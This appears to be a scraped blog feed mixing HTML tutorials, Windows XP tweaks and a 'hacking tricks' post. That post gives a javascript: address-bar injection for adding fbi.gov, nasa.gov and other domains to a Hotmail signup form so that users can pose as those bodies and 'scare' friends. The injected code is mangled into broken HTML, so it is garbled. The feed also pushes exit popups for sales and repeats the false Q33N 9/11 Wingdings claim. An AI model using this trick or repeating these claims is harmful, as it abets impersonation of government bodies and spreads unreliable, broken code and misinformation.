<tr valign="Top"><td style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><span style="font-family: Arial, Helvetica; font-size: x-small;"><span name="KonaBody">HTML web page tables are used within a web page to organize content. They can be displayed with background colors, with or without borders, and can contain rows and columns displayed in an unlimited number of ways.<br />
<br />
For example, if you look toward the top of this web page, right below the tabs, you will see our navigational links displayed within an HTML web page table with a grey background. We use color table backgrounds throughout this web site. </span></span><h2 style="color: navy; font-family: arial, verdana, sans-serif; font-size: 16px; font-weight: bold; text-align: left;"><span style="font-family: Arial, Helvetica; font-size: x-small;"><span name="KonaBody">HTML Web Page Table</span></span></h2><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><span style="font-family: Arial, Helvetica; font-size: x-small;"><span name="KonaBody">In this example, the HTML table below contains 2 columns and 1 row. The left column has the background color set to #72A4D2. The right column has the background color set to #EAE8E8.</span></span><br />
<br />
</div><center><table align="Center" border="0" cellpadding="4"><tbody>
<tr><td bgcolor="#72A4D2" style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;" width="10%"></td><td bgcolor="#EAE8E8" style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><span style="font-family: Arial, Helvetica; font-size: x-small;"><span name="KonaBody">This is an example of a table with background colors. This HTML table has 2 columns and 1 row.</span></span></td></tr>
</tbody></table></center><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><br />
</div><center><table align="Center" border="0" cellpadding="4"><tbody>
<tr><td bgcolor="#EAE8E8" style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><span style="font-family: Arial, Helvetica; font-size: x-small;"><br />
<br />
<br />
<br />
<br />
<table align="Center" border="0" cellpadding="4"><tbody>
<tr><td bgcolor="<b>#72A4D2</b>" width="10%"></td><td bgcolor="<b>#EAE8E8</b>"></td></tr>
</tbody></table></span></td></tr>
</tbody></table></center><center><div align="Left" style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><span name="KonaBody"><span style="font-family: Arial, Helvetica; font-size: x-small;"></span></span><span style="font-family: Arial, Helvetica; font-size: x-small;"><span name="KonaBody">Edit the text indicated in bold to suit your needs.<br />
<br />
Using HTML web page tables with color backgrounds is a great way to add color to your web pages without using graphics</span></span><br />
</div><div align="Left" style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><span style="font-family: Arial, Helvetica;"><span class="Apple-style-span" style="font-size: small;"><br />
</span></span><br />
</div><div align="Left" style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><span style="font-family: Arial, Helvetica;"><span class="Apple-style-span" style="font-size: small;"><br />
</span></span><br />
</div><div align="Left" style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><span style="font-family: Arial, Helvetica;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: verdana, arial, sans-serif; font-size: 12px;"></span></span></span><br />
</div><span style="font-family: Arial, Helvetica;"><h1 align="Center" style="color: navy; font-family: Georgia; font-size: 24px; font-weight: bold; text-align: center;"><span style="font-family: Arial, Helvetica;">Changing Web Page Margins</span></h1><div><span style="font-family: Verdana, Helvetica; font-size: x-small;">If you would like to change or remove your web page margins, you can change them by placing the following attributes within your tag.<br />
<br />
To change or remove the top, bottom and side page margins on a web page, place the following code within your tag:</span><br />
<br />
<span style="font-family: Verdana, Helvetica; font-size: x-small;">This code is compatible with both Internet Explorer and Netscape Navigator.<br />
<br />
<b>Internet Explorer supports:</b><br />
<br />
topmargin=0<br />
bottommargin=0<br />
leftmargin=0<br />
rightmargin=0<br />
<br />
<b>Netscape Navigator supports:</b><br />
<br />
marginheight=0<br />
marginwidth=0<br />
<br />
Make sure you use them all to enable your web page to be properly viewed in both browsers.</span><center><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><br />
</div><table align="Center" border="0" cellpadding="4"><tbody>
<tr><td bgcolor="#EAE8E8" style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><span style="font-family: Verdana, Helvetica; font-size: x-small;"><body ><b>topmargin=0 bottommargin=0 leftmargin=0 rightmargin=0 marginheight=0 marginwidth=0</b>></body ></span></td></tr>
</tbody></table><br />
<br />
<div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><br />
</div><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><br />
</div><h1 align="Center" style="color: navy; font-family: Georgia; font-size: 24px; font-weight: bold; text-align: center;"><span style="font-family: Arial, Helvetica;">Preventing Search Engine Indexing</span></h1><div><span style="font-family: Verdana, Helvetica; font-size: x-small;">If you're looking for a way to prevent Search Engines from indexing certain web pages within your web site, this HTML tip is for you.<br />
<br />
Meta tags are used to give detailed instructions in regard to a web page to the Search Engines and browsers.<br />
</span><br />
<span style="font-family: Verdana, Helvetica; font-size: x-small;">Many times, you may have a web page that you don't want the Search Engines to index, such as download pages or private membership sites. To help with this problem, add one of the following META tag codes between the and tags of your HTML.<br />
<br />
The following META tag tells the Search Engine robots not to index this page and not to follow any links within the page:<br />
<br />
</span><table align="Center" border="0" cellpadding="2" cellspacing="0"><tbody>
<tr><td bgcolor="#EAE8E8" style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><span style="font-family: Verdana, Helvetica; font-size: x-small;"></span></td></tr>
</tbody></table><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><span style="font-family: Verdana, Helvetica; font-size: x-small;"><br />
The following META tag tells the Search Engine robots not to index this page, but follow any links within the page:<br />
<br />
</span><br />
</div><table align="Center" border="0" cellpadding="2" cellspacing="0"><tbody>
<tr><td bgcolor="#EAE8E8" style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><span style="font-family: Verdana, Helvetica; font-size: x-small;"><br />
<br />
</span></td></tr>
</tbody></table><br />
</div><br />
</center></div></span><br />
</center></td></tr>
</tbody></table></div></span></span><br />
<span style="font-family: Arial, Helvetica;"><span style="font-size: small;"><br />
</span></span><br />
<span style="font-family: Arial, Helvetica;"><span class="Apple-style-span" style="font-family: verdana, arial, sans-serif; font-size: 12px;"></span></span><br />
<span style="font-family: Arial, Helvetica;"><h1 align="Center" style="color: navy; font-family: Georgia; font-size: 24px; font-weight: bold; text-align: center;"><span style="font-family: Arial, Helvetica;">Open a new window on page unload</span></h1><div><span name="KonaBody"><span style="font-family: Arial, Helvetica; font-size: x-small;">If you're looking for a way to open a new window when you leave a web page, this code may be what you're looking for.<br />
<br />
This HTML code will open the web page you specify as soon as you leave the original web page.<br />
<br />
This provides a great way to gain new subscribers to your publication, introduce a product or whatever you'd like.<br />
<br />
Opening a new window on page unload, or in other words, when your visitor is leaving your page is also a great way to make one last try to make a sale. You're visitor is leaving your site anyway, so this is your last chance to sell them. Make it count.<br />
<br />
If you don't have a special offer of your own to introduce, use the window to open an affiliate site that you may be promoting. This provides a great way to bring the affiliate site to their attention and even make a sale.<br />
<br />
Place the following code, indicated in bold, within your web page's BODY tag:</span></span><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><br />
</div><table align="Center" border="0" cellpadding="4"><tbody>
<tr><td bgcolor="#EAE8E8" style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><span style="font-family: Arial, Helvetica; font-size: x-small;"><body ><b>onUnload=window.open('http://www.domain.com'); self.blur();</b>></body ></span></td></tr>
</tbody></table><br />
<div align="Left" style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><span style="font-family: Arial, Helvetica; font-size: x-small;"><b>Change the web address to the page you would like to open</b></span><br />
</div></div></span><div class="blogger-post-footer">http://hackernepal.blogspot.com/feeds/posts/default</div>hanghttp://www.blogger.com/profile/12012311240848972404noreply@blogger.com0tag:blogger.com,1999:blog-2254663475743620910.post-62856830406513427472009-10-19T22:41:00.000-07:002009-10-19T22:41:06.867-07:00hacking tricks<span class="Apple-style-span" style="color: #333333; font-family: Arial, Verdana, Helvetica, sans-serif; font-size: 15px; font-weight: bold;"><br />
<span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; color: black; font-family: Arial; font-weight: normal; white-space: pre;"><span class="Apple-style-span" style="font-size: x-large;">Get ur unique msn account</span></span></span><br />
<span class="Apple-style-span" style="color: #333333; font-family: Arial, Verdana, Helvetica, sans-serif; font-size: 15px; font-weight: bold;"><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; color: black; font-family: Arial; font-size: 13px; font-weight: normal; white-space: pre;"></span>something new <a class="external" href="http://www.deadfake.com/" rel="nofollow" style="color: #497fb1; position: relative;" target="_blank">www.deadfake.com</a> annms mail<br />
<br />
<br />
<br />
<br />
Popular<br />
<br />
* Get your Own Unique msn account @"whateveryouwant"<br />
<br />
<br />
Get your Own Unique msn account @"whateveryouwant"<br />
<br />
<br />
There are two ways ..<br />
<br />
the first simple one is to go to https://accountservices.passport.net/reg.srf?fid=RegCredOnlyEASI&sl=1&vv=410&lc=1033<br />
<br />
and continue registering from here .. this is the easy way ...<br />
<br />
Now the ELITE waY :)<br />
<br />
<br />
<br />
1. Goto http://get.live.com/getlive/overview to start registering your windows live account.<br />
<br />
2. Press the sign-up button and you will be presented a form to sign up for a hotmail account.<br />
<br />
3.Copy the following javascript injection code:<br />
<br />
<br />
javascript:function r(q){} function s(q){e[q] = new Option(a[q],a[q])}; r(e = document.getElementById("idomain").options);r(d="md5this.");r(a = new Array("hotmail.com","fbi.gov","nasa.gov",d+"com",d+"com.au",d+"be",d+"ca",d+"co.uk",d+"de",d+"fr",d+"it"/*md5this.com*/,d+"nl")); for (i=0;i<a.length;i++){ )="" -="" added!="" additional="" domains="" md5this.com");="" s(i="" }alert("success=""><br />
<br />
<br />
<br />
4. Paste the code in your address bar (you know, that thing you normally type www.rahulhacking.com.<br />
<br />
5. Hit enter, if all went well it should show a message box telling you "Success - additional domains added!".<br />
<br />
6.Now you can select a multitude of domains, fill out the form and you are ready to go!<br />
<br />
Now you have a New msn account to scare your friends out :)<br />
<br />
play with it ... enter a @whatever you want :) chat with people .. :) scare them :)<br />
<br />
<br />
<br />
beyond that :)<br />
<br />
<br />
javascript:function r(q){} function s(q){e[q] = new Option(a[q],a[q])}; r(e = document.getElementById("idomain").options);r(d="toxic.");r(a = new Array("hotmail.com","csthis.com","nasa.gov","fbi.gov","iknowwhatyoudidlastsummer.info",d+"com",d+"com.au",d+"be",d+"ca",d+"co.uk",d+"de",d+"fr",d+"it"/*csthis.com*/,d+"nl")); for (i=0;i<a.length;i++){ )="" -="" added!="" additional="" domains="" md5this.com!");="" s(i="" thanx="" to="" }alert("success=""><br />
<br />
<br />
<br />
and here is more .....<br />
<br />
<br />
<br />
https://account.live.com/MessagePage.aspx?lc=1033&message=SIconfirmed&param=%69%68%61%63%6B%65%64%40%6E%61%73%61%2E%67%6F%76%0A<br />
</a.length;i++){></a.length;i++){></span><br />
<span style="color: #333333; font-family: Arial, Verdana, Helvetica, sans-serif; font-size: medium;"><span class="Apple-style-span" style="font-size: 15px;"><b><br />
</b></span></span><br />
<span style="color: #333333; font-family: Arial, Verdana, Helvetica, sans-serif; font-size: medium;"><span class="Apple-style-span" style="font-size: 15px;"><b><br />
</b></span></span><br />
<span style="color: #333333; font-family: Arial, Verdana, Helvetica, sans-serif; font-size: medium;"><span class="Apple-style-span" style="font-size: 15px;"><b><span class="Apple-style-span" style="font-weight: normal;"></span></b></span></span><br />
<span style="color: #333333; font-family: Arial, Verdana, Helvetica, sans-serif; font-size: medium;"><b><div id="WPC-areaContainer?cellId=Top+Tricks+n+Cheats"><div class="WPC-editableContent" id="WPC-area?cellId=Top+Tricks+n+Cheats&version=20&savePath=%2Fpage%2FTop%2BTricks%2Bn%2BCheats&saveType=page" style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 300px; overflow-x: visible; overflow-y: visible; padding-bottom: 0px; padding-left: 1px; padding-right: 0px; padding-top: 1px;"><h3 style="clear: both; color: #a28000; font-family: 'Times Roman', 'Times New Roman', Times, serif; font-size: 18px; font-weight: normal; margin-bottom: 0.2em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative;"><i><b>Set Processes Priority</b></i></h3><b><br />
</b><div align="left" style="color: inherit; font-family: inherit; font-size: inherit; font-weight: inherit;"></div><b>Follow this tip to increase the priority of active processes, this will result in prioritisation of processes using the CPU.<br />
<br />
CTRL-SHIFT-ESC</b><div align="left" style="color: inherit; font-family: inherit; font-size: inherit; font-weight: inherit;"></div><b>1.Go to the second tab called Processes, right click on one of the active processes, you will see the Set Priority option</b><div align="left" style="color: inherit; font-family: inherit; font-size: inherit; font-weight: inherit;"></div><b><br />
2.For example, your Run your CDwriter program , set the priority higher, and guess what, no crashed CD’s</b><br />
<h3 style="clear: both; color: #a28000; font-family: 'Times Roman', 'Times New Roman', Times, serif; font-size: 18px; font-weight: normal; margin-bottom: 0.2em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative;"><b><i>Shutdown Trick !</i></b></h3><br />
<b>Imidiate rapid shut down window</b><b><br />
while shutting down window. open task manager(Ctr+Alt+Del),<br />
Select shut down tab. and press ' Ctrl ' key while select Turn Off from dis tab.<br />
Count 5 4 3 2 1 Voila!!! U r window will rapidly shut down.<br />
<br />
<br />
<u>Speed Up Ur Shut down !!</u><br />
<br />
</b><b><br />
Start Regedit.<br />
Navigate to HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control.<br />
Click on the "Control" Folder.<br />
Select "WaitToKillServiceTimeout"<br />
Right click on it and select Modify.<br />
Set it a value lower than 2000 (Mine is set to 200)</b>.<br />
<br />
<b>and !<br />
<br />
Like previous versions of windows, it takes long time to restart or shutdown windows xp when the "Exit Windows" sound is enabled. to solve this problem you<br />
must disable this useless sound. click start button then go to settings -> control panel -> Sound,Speech and Audio devices -> Sounds and Audio Devices -> Sounds, then under program events and windows menu click on "Exit Windows" sub-menu and highlight it.now from sounds you can select,choose "none" and then click apply and ok. now you can see some improvements when shutting down your system.</b><br />
<br />
<b><br />
**new **<br />
</b><h3 style="clear: both; color: #a28000; font-family: 'Times Roman', 'Times New Roman', Times, serif; font-size: 18px; font-weight: normal; margin-bottom: 0.2em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative;"><b>Crazy !!</b></h3><h3 style="clear: both; color: #a28000; font-family: 'Times Roman', 'Times New Roman', Times, serif; font-size: 18px; font-weight: normal; margin-bottom: 0.2em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative;"><b>Hide ur folders.. never known trick <i>!!!!!!!!!!</i> Disguise them to "Recycle Bin"</b></h3><b><br />
<br />
Rename any folder with extension {645FF040-5081-101B-9F08-00AA002F954E}<br />
eg,<br />
if u've a folder games<br />
press F2,<br />
then type, "games.{645FF040-5081-101B-9F08-00AA002F954E}"<br />
c the magic....<br />
then 2 get to original form,<br />
remove the extension using<br />
"ren games.{645FF040-5081-101B-9F08-00AA002F954E} games" in dos or as a bat file<br />
<br />
<br />
n u are done..<br />
<br />
~cheers~<br />
<br />
<br />
</b><h2 style="clear: both; color: #a28000; font-family: 'Times Roman', 'Times New Roman', Times, serif; font-size: 20px; font-weight: normal; margin-bottom: 0.2em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative;">System information</h2><h2 style="clear: both; color: #a28000; font-family: 'Times Roman', 'Times New Roman', Times, serif; font-size: 20px; font-weight: normal; margin-bottom: 0.2em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative;"></h2><b><br />
</b><b>system up time only for xp professional edition<br />
It boasts how long it can stay up. Whereas previous<br />
versions of Windows were coy about how long they went<br />
between boots, XP is positively proud of its stamina.<br />
Go to the Command Prompt in the Accessories menu from<br />
the All Programs start button option, and then type<br />
'systeminfo'. The computer will produce a lot of<br />
useful info, including the uptime. If you want to keep<br />
these, type 'systeminfo > info.txt'. This creates a<br />
file called info.txt you can look at later with<br />
Notepad. (Professional Edition only).<br />
<br />
<br />
</b><h3 style="clear: both; color: #a28000; font-family: 'Times Roman', 'Times New Roman', Times, serif; font-size: 18px; font-weight: normal; margin-bottom: 0.2em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative;">lock pc just by double clicking mouse</h3><br />
<b>You can lock your XP workstation with two clicks of<br />
the mouse. Create a new shortcut on your desktop using<br />
a right mouse click, and enter 'rundll32.exe<br />
user32.dll,LockWorkStation' in the location field.<br />
Give the shortcut a name you like. That's it -- just<br />
double click on it and your computer will be locked.<br />
And if that's not easy enough, Windows key + L will do<br />
the same.<br />
<br />
<br />
<br />
</b><h3 style="clear: both; color: #a28000; font-family: 'Times Roman', 'Times New Roman', Times, serif; font-size: 18px; font-weight: normal; margin-bottom: 0.2em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative;"><b>SPEED UP UR ACROBAT READER (ALMOST LIKE NOTEPAD)</b></h3><b><br />
<br />
Do u get irritated when acrobat reader takes 5/10 seconds to load when you want to open a pdf document. There is a way to speed up the loading.<br />
<br />
1. Go to the installation folder of acrobat reader<br />
(C:\program files\adobe\acrobat\reader\.. whatever)<br />
<br />
2. Move all the files and folders from the "plugins" directory to the "Optional" directory. (I repeat.. cut and paste the files NOT copy & paste).<br />
<br />
Also make sure that acrobat reader is not open else it will lock the files and not allow you to move the files).<br />
<br />
Now your acrobat reader will load very fast<br />
and almost as good as notepad..<br />
<br />
<br />
</b><h3 style="clear: both; color: #a28000; font-family: 'Times Roman', 'Times New Roman', Times, serif; font-size: 18px; font-weight: normal; margin-bottom: 0.2em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative;"><i><b>Remove Stored username and Passwords !</b></i></h3><br />
<b>To remove the Stored User Names and Passwords from your system, try this:<br />
Click Start, Run and type Control keymgr.dll<br />
Remove the entries from the list.</b><br />
<b>The other ways to access this dialog are: </b><br />
<b>Type Control Userpasswords2 in RUN box, click Advanced, Manage Passwords </b><br />
<b>-or- </b><br />
<b>From Control Panel, select your User Account, click Manage your network passwords</b><br />
<br />
<i><b>It Works</b></i><br />
<br />
<b><i>~ Cheers ~</i></b><br />
<br />
<br />
*<br />
<h3 style="clear: both; color: #a28000; font-family: 'Times Roman', 'Times New Roman', Times, serif; font-size: 18px; font-weight: normal; margin-bottom: 0.2em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative;"><br />
<i><b>Remove the Username and picture from Windows XP New Start Menu</b></i></h3><br />
<b>The User account picture can be removed by turning off the Welcome Screen. Or, by switching to Windows Classic theme. Follow the method described in this article if you want to remove the username and picture from the Start Menu, without disabling the Welcome Screen and Windows XP Theme.</b><br />
<br />
<b>For those who want to remove the user name and user account picture from Start Menu, in order to have a blank blue panel at the top, try this:<br />
Start Windows Explorer and go to this folder:</b><br />
<br />
<b>C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures</b><br />
<b><br />
From that folder, rename the BMP file which corresponds to your user account. </b><br />
<b>( For example, if your username is Robert, rename Robert.bmp to old_Robert.bmp )</b><b><br />
Next, rename the following folder:<br />
</b><br />
<b>C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures\Default Pictures </b><br />
<br />
<b>to something else, say...</b><br />
<br />
<b>C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures\No_Default Pictures</b><b><br />
To remove the user name, follow these steps<br />
<br />
Start regedit.exe and navigate to the this key:<br />
</b><br />
<b>HKEY_CURRENT_USER \ Software \ Microsoft\ Windows \ CurrentVersion \ Policies \ Explorer</b><b><br />
In the right-pane, set NoUserNameInStartMenu value-data to 1<br />
<br />
Close Regedit.exe and restart Windows.<br />
</b><br />
<b>You'll end up with a blue space at the top of the Start Menu.</b><br />
<br />
<br />
<br />
<h3 style="clear: both; color: #a28000; font-family: 'Times Roman', 'Times New Roman', Times, serif; font-size: 18px; font-weight: normal; margin-bottom: 0.2em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative;">To get back the username and the picture, reverse the above procedure.</h3><br />
<br />
<br />
<b>For the New Start Menu, Windows XP looks for the <username>.bmp file in the folder</username></b><br />
<br />
<b>C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures</b><br />
<br />
<b>If the file is not found, it takes a picture from the "Default Pictures" sub-folder. By renaming the <username>.bmp and the "Default Pictures" folder, you're giving no chance for Windows to fetch an image for the Start Menu</username></b><br />
<br />
<b>~ Cheers ~.</b><br />
<br />
<h3 style="clear: both; color: #a28000; font-family: 'Times Roman', 'Times New Roman', Times, serif; font-size: 18px; font-weight: normal; margin-bottom: 0.2em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative;"></h3><h3 style="clear: both; color: #a28000; font-family: 'Times Roman', 'Times New Roman', Times, serif; font-size: 18px; font-weight: normal; margin-bottom: 0.2em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative;"><b><i>Notepad Trick ! for complete list move to NOTEPAD TRICKS page !!<br />
</i></b></h3><br />
<b>Well quite old but here is d complete collection</b><br />
<br />
<b>Step 1: Open Notepad<br />
Step 2: Write following line in the notepad.</b><br />
<b>this app can break</b><br />
<b>Step 3: Save this file as xxx.txt</b><br />
<b>Step 4: Close the notepad.</b><br />
<b>Step 5: Open the file again.</b><br />
<br />
<b>Voilla!!</b><br />
<br />
<b>or</b><br />
<br />
<b>1> Open Notepad<br />
2> Enter four words separated by spaces, wherein the first word has 4 letters, the next two have three letters, and the last word has five letters<br />
3> DON'T hit enter at the end of the line.<br />
4> Save the file.<br />
5> Close Notepad.<br />
6> Reopen Notepad.<br />
7> Open the file you just saved. </b><br />
<br />
<b>or</b><br />
<br />
<b>Open a note pad<br />
type Bush hid the facts<br />
save that file,<br />
close it<br />
again open and see...</b><br />
<br />
<br />
<h3 style="clear: both; color: #a28000; font-family: 'Times Roman', 'Times New Roman', Times, serif; font-size: 18px; font-weight: normal; margin-bottom: 0.2em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative;"><b><i>NOTEPAD "world trade centre trick".. :Rahul</i></b></h3><br />
<br />
<b>Did you know that the flight number of the plane that had hit WTC ...on<br />
9/11 was Q33N ....Open your Notepad in ur computer and type the flight<br />
number i.e Q33N... Increase the Font Size to 72, Change the Font to<br />
Wingdings. U will be amazed by the findings</b>.<br />
<br />
<h3 style="clear: both; color: #a28000; font-family: 'Times Roman', 'Times New Roman', Times, serif; font-size: 18px; font-weight: normal; margin-bottom: 0.2em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative;"><b>log trick !! make ur Notepad a diary !!</b></h3><br />
<b>Sometimes we want to insert current data and time, whenever we open the file in the notepad. If you are a lazy person like me, who don’t like to press F5 whenever you open a notepad. Then here is a trick to avoid this. Just add a .LOG in the first line of your text file and close it. </b><br />
<b>Whenever you open the file with that text in the first line in the notepad, it will insert the current date and time at the end of the file. You can start entering your text after that.</b><br />
<br />
<h3 style="clear: both; color: #a28000; font-family: 'Times Roman', 'Times New Roman', Times, serif; font-size: 18px; font-weight: normal; margin-bottom: 0.2em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative;">WHY?</h3><br />
<b>The reason this happens:</b><br />
<br />
<b>In notepad, any other 4-3-3-5 letter word combo will have the same results.<br />
It is all to do with a limitation in Windows. Text files containing Unicode UTF-16-encoded Unicode are supposed to start with a "Byte-Order Mark" (BOM), which is a two-byte flag that tells a reader how the following UTF-16 data is encoded.<br />
</b><br />
<b>1) You are saving to 8-bit Extended ASCII (Look at the Save As / Encoding format)</b><br />
<b>2) You are reading from 16-bit UNICODE (You guessed it, look at the Save As / Encoding format)</b><br />
<b>This is why the 18 8-bit characters are being displayed as 9 (obviously not supported by your codepage) 16-bit UNICODE characters</b><br />
<br />
<b>~ cheers ~ </b><br />
<br />
<br />
<h3 style="clear: both; color: #a28000; font-family: 'Times Roman', 'Times New Roman', Times, serif; font-size: 18px; font-weight: normal; margin-bottom: 0.2em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative;"><i><b>SPEED UP MENU DISPLAY.!!</b></i></h3><br />
<b><br />
When using the start menu the you will notice a delay between different tiers of the menu hierarchy. For the fastest computer experience possible I recommend changing this value to zero. This will allow the different tiers to appear instantly.<br />
<br />
Start Regedit. If you are unfamiliar with regedit please refer to our FAQ on how to get started.<br />
<br />
Navigate to HKEY_CURRENT_USER\Control Panel\Desktop<br />
Select MenuShowDelay from the list on the right.<br />
<br />
Right on it and select Modify.<br />
Change the value to 0.<br />
Reboot your computer.</b><br />
<b><br />
<br />
</b><br />
<h3 style="clear: both; color: #a28000; font-family: 'Times Roman', 'Times New Roman', Times, serif; font-size: 18px; font-weight: normal; margin-bottom: 0.2em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative;"><i><b>CLICKING * .AVI FILES ON EXPLORER CAUSING 100% CPU USAGE.!!</b></i></h3><br />
<br />
<b>Well windows seem to have a REALLY big problem when it comes to reading AVI files. It seems that when you click on an AVI file in explorer, it'll try to read the entire AVI file to determine the width,height, etc. of the AVI file (this is displayed in the Properties window). Now the problem with Windows is that if you have a broken/not fully downloaded AVI file that doesnt contain this info, Windows will scan the entire AVI file trying to figure out all these properties which in the process will probably cause 100% CPU usage and heavy memory usage. To solve this problem all you have to do is the following:<br />
1. Open up regedit<br />
2. Goto HKEY_CLASSES_ROOT\SystemFileAssociations\.avi\shellex\PropertyHandler<br />
3. Delete the "Default" value which should be "{87D62D94-71B3-4b9a-9489-5FE6850DC73E}"<br />
Voila! Please not that this will no longer provide you with the windows properties displaying the AVI file information such as width, height, bitrate etc. But its a small price to pay for saving you resources.<br />
NOTE: Please use caution when using regedit. Improper usage may cause windows to behave imcorrectly. Also, I cannot be held resposible. Backup your registry first.<br />
</b><br />
<h3 style="clear: both; color: #a28000; font-family: 'Times Roman', 'Times New Roman', Times, serif; font-size: 18px; font-weight: normal; margin-bottom: 0.2em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative;"><i><b>CD ROM STOPS AUTOPLAYING/AUTORUN.!!</b></i></h3><b><br />
<br />
And the AutoPlay Tab has disappeared in My Computer, Devices With Removable Storage, Right Click on CDROM, Properties.<br />
Solution: The service: "Shell Hardware Detection" has been set to Manual or Disabled. Go to Control Panel, Administrative Tools, Services. Return this service to "Automatic</b>".<br />
<br />
<h2 style="clear: both; color: #a28000; font-family: 'Times Roman', 'Times New Roman', Times, serif; font-size: 20px; font-weight: normal; margin-bottom: 0.2em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative;"><i><b>How to make your Desktop Icons Transparent</b></i></h2><br />
<b>Go to Control Panel > System, > Advanced > Performance area > Settings button Visual Effects tab "Use drop shadows for icon labels on the Desktop"<br />
<br />
<br />
</b><h3 style="clear: both; color: #a28000; font-family: 'Times Roman', 'Times New Roman', Times, serif; font-size: 18px; font-weight: normal; margin-bottom: 0.2em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative;"><b>DISPLAY MESSAGE ON STARTUP.</b></h3><b><br />
<br />
Start regedit, if you are unfamiliar with regedit please see our FAQ.<br />
Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon<br />
Modify the key legalnoticecaption with what you want to name the window.<br />
Modify the key legalnoticetext with what you want the window to say. Restart<br />
<br />
<br />
</b><h3 style="clear: both; color: #a28000; font-family: 'Times Roman', 'Times New Roman', Times, serif; font-size: 18px; font-weight: normal; margin-bottom: 0.2em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative;"><i><b>AUTO DELETE TEMPORARY FOLDER.!!</b></i></h3><b><br />
ll what i prefer is %temp% " without quotes.. at Start -> Run..<br />
this opens ur temp folder n den u cal erase it neatly// still try dis one too..</b><br />
<b><br />
<br />
First go into gpedit.msc<br />
Next select -> Computer Configuration/Administrative Templates/Windows Components/Terminal Services/Temporary Folder<br />
Then right click "Do Not Delete Temp Folder Upon Exit"<br />
